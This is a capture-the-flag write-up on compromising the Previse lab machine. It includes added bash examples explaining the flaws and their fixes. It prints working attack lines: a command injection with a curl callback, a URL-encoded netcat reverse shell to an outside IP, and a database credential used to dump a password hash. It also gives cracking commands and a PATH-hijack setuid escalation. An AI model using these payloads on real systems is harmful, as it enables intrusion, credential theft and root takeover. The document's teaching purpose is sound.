Hello everyone, today I'll show you how I pwned the Previse machine.

Recon Steps

First of all, after we got the IP we ran a port scan to see which ports are open: nmap -sV -sC IP ->

Okay, we have only 2 ports open: 22 (SSH) and 80 (HTTP).

Let's check port 80 first. The first thing we found was a login page, so I tried the default credentials admin:admin. Oooh, it works and we are logged in as admin. After logging in I decided to recon the site first.

What I found was a sitebackup.zip, and we all know what that means xD: the source code of the site. I downloaded it and started checking some files, such as config.php, and got this ->
Then I checked some more files, and the important one was logs.php ->
Here I found that the PHP file uses exec() to run another script on the system and does not validate the input at all. We can reach this code with a request to /file_logs.php, pick any value for delim, and intercept the request with Burp.

So I created a payload to check for RCE: start a listener with nc -nlvp 1234, then from Burp change the delim parameter so the server fetches a file from my machine: delim=comma%26curl+http://10.10.16.3:1234 (%26 is a URL-encoded &, so the injected curl runs as a second shell command after the script). The request came back 200 OK and the callback showed up on the nc listener; the callback, not the 200, is what confirms code execution.

Access [m4lwhere] user

  • So I made my payload to get a reverse shell -> comma%26rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f%7Cbash%20-i%202>%261%7Cnc%2010.10.16.3%204444%20>/tmp/f (the usual mkfifo netcat reverse shell, URL-encoded, with a listener on port 4444 waiting on my side). OK, we have a reverse shell as www-data. Using the credentials we found earlier in config.php, I ran mysql to check the databases: echo "mySQL_p@ssw0rd!:)" | mysql -u root -p and started to interact with the database.
    Now we have the m4lwhere password hash: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. (the $1$ prefix means md5crypt). Crack it with hashcat or john: hashcat -a 0 -m 500 hash /usr/share/wordlists/rockyou.txt or john --format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash. We got the password ilovecody112235! and can now connect over SSH with these credentials.
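To make the injection concrete, here is an added bash example (not code from the original writeup) that URL-decodes the two delim payloads above and rebuilds the command line the vulnerable exec() ends up running, then shows the allowlist check a fixed logs.php should apply before calling exec(). The exec() command prefix and the set of valid delim values (comma, space, tab) are assumptions, since the writeup shows the PHP source only as a screenshot.

```bash
#!/usr/bin/env bash
# Added example: decode the delim payloads and show why exec() executes them.
# Assumptions (not from the writeup): the exec() prefix below and the
# allowlist of valid delim values.
set -eu

# Assumed shape of the vulnerable exec() call in logs.php: the user-supplied
# delim is concatenated straight into a shell command line.
EXEC_PREFIX="/usr/bin/python /opt/scripts/log_process.py"   # assumption

# Decode application/x-www-form-urlencoded: '+' is a space, %XX is a byte.
urldecode() {
  local s="${1//+/ }"
  printf '%b' "${s//%/\\x}"
}

# Command line the vulnerable code hands to /bin/sh -c for a given raw delim.
vulnerable_command() {
  printf '%s %s' "$EXEC_PREFIX" "$(urldecode "$1")"
}

# Allowlist check the fixed logs.php should do before calling exec():
# anything that is not one of the known delimiter names is rejected.
delim_is_valid() {
  case "$1" in
    comma|space|tab) return 0 ;;
    *) return 1 ;;
  esac
}

# Hardened builder: reject unknown values, and quote what is passed on so a
# delimiter name can never become a second shell command (PHP would use
# escapeshellarg(); printf %q does the same job for bash).
safe_command() {
  local delim
  delim="$(urldecode "$1")"
  delim_is_valid "$delim" || return 1
  printf '%s %s' "$EXEC_PREFIX" "$(printf '%q' "$delim")"
}

# Constructed inputs: the RCE check and the reverse shell from the writeup.
RCE_CHECK='comma%26curl+http://10.10.16.3:1234'
REVSHELL='comma%26rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f%7Cbash%20-i%202>%261%7Cnc%2010.10.16.3%204444%20>/tmp/f'

main() {
  echo "Vulnerable exec() runs:"
  # The '&' backgrounds the python job; curl runs as a second, attacker-chosen command.
  echo "  $(vulnerable_command "$RCE_CHECK")"
  echo "  $(vulnerable_command "$REVSHELL")"
  echo "Hardened version:"
  safe_command "$RCE_CHECK" || echo "  rejected: $RCE_CHECK"
  safe_command 'comma' && echo
}
main
```

The decoded lines make the bug obvious: nothing between the form field and the shell ever asks whether "comma" is the whole value. Validating against a fixed set of names before exec() is the fix; escaping alone would still let the value reach the shell.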

Privilege Escalation

  • For privesc we run sudo -l and enter the password.
    We get a script we can run as root, but we cannot edit it.
  • If we read the script carefully we see that it calls the date command without an absolute path, so we can override this command with our own code by putting a fake date earlier in PATH.
bash-4.4$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > date
bash-4.4$ chmod 777 date
bash-4.4$ export PATH=/tmp:$PATH
bash-4.4$ sudo /opt/scripts/access_backup.sh 
  1. First line: we write a one-liner that copies /bin/bash to /tmp/bash and sets the setuid bit on the copy into a file called date (run this from /tmp, since that is the directory we are about to prepend to PATH).
  2. Second line: we change the file's permissions so anyone can execute it.
  3. Third line: we put /tmp at the beginning of PATH, so when the script runs date the shell finds our file before the real command. This only works because sudo passes our PATH through; if the Defaults shown by sudo -l included a secure_path, PATH would be reset and the trick would fail.
  4. We run the privileged script with sudo and wait for it.
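The four steps above, as an added bash demo (not from the writeup) that runs as an unprivileged user: it builds a throwaway directory standing in for /tmp, a stand-in for /opt/scripts/access_backup.sh that calls date without a path (the script's real contents are not shown, so its body is assumed), and a fake date that prints a marker instead of planting a setuid bash. It then shows the hijack succeeding against the original and failing against a hardened copy that resets PATH before calling date.

```bash
#!/usr/bin/env bash
# Added example: PATH hijack against a script that calls `date` unqualified,
# next to the hardened version. Nothing here needs sudo; the fake date prints
# a marker instead of creating a setuid bash copy.
set -eu

WORKDIR="$(mktemp -d)"          # stands in for the world-writable /tmp
trap 'rm -rf "$WORKDIR"' EXIT

# Stand-in for /opt/scripts/access_backup.sh (assumed body: the writeup only
# tells us it calls date without an absolute path).
cat > "$WORKDIR/access_backup.sh" <<'EOF'
#!/bin/sh
date
EOF

# Hardened copy: reset PATH to trusted directories first, so whatever the
# caller exported cannot influence which `date` runs. Calling /bin/date
# by absolute path works as well.
cat > "$WORKDIR/access_backup_fixed.sh" <<'EOF'
#!/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
export PATH
date
EOF

# The attacker's fake date, same idea as `echo '...' > date; chmod 777 date`.
printf '%s\n' '#!/bin/sh' 'echo HIJACKED' > "$WORKDIR/date"
chmod 777 "$WORKDIR/date" "$WORKDIR/access_backup.sh" "$WORKDIR/access_backup_fixed.sh"

# Step 3 of the writeup: prepend the writable directory to PATH, then run the
# script. Output is returned so a caller can check which date was executed.
run_vulnerable_script() {
  PATH="$WORKDIR:$PATH" "$WORKDIR/access_backup.sh"
}

run_hardened_script() {
  PATH="$WORKDIR:$PATH" "$WORKDIR/access_backup_fixed.sh"
}

echo "vulnerable script output: $(run_vulnerable_script)"   # HIJACKED
echo "hardened script output:   $(run_hardened_script)"     # the real date
```

On the box the final step is sudo running the script, which only carries your exported PATH through when sudo is not enforcing secure_path; that is why the Defaults printed by sudo -l are worth reading before trying this.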

The last step is to check for the file we copied: /tmp/bash should now be owned by root with the setuid bit set. Run it with /tmp/bash -p (the -p flag keeps the effective UID of root; without it bash drops the privileges again).

Congrats!!! you are root now….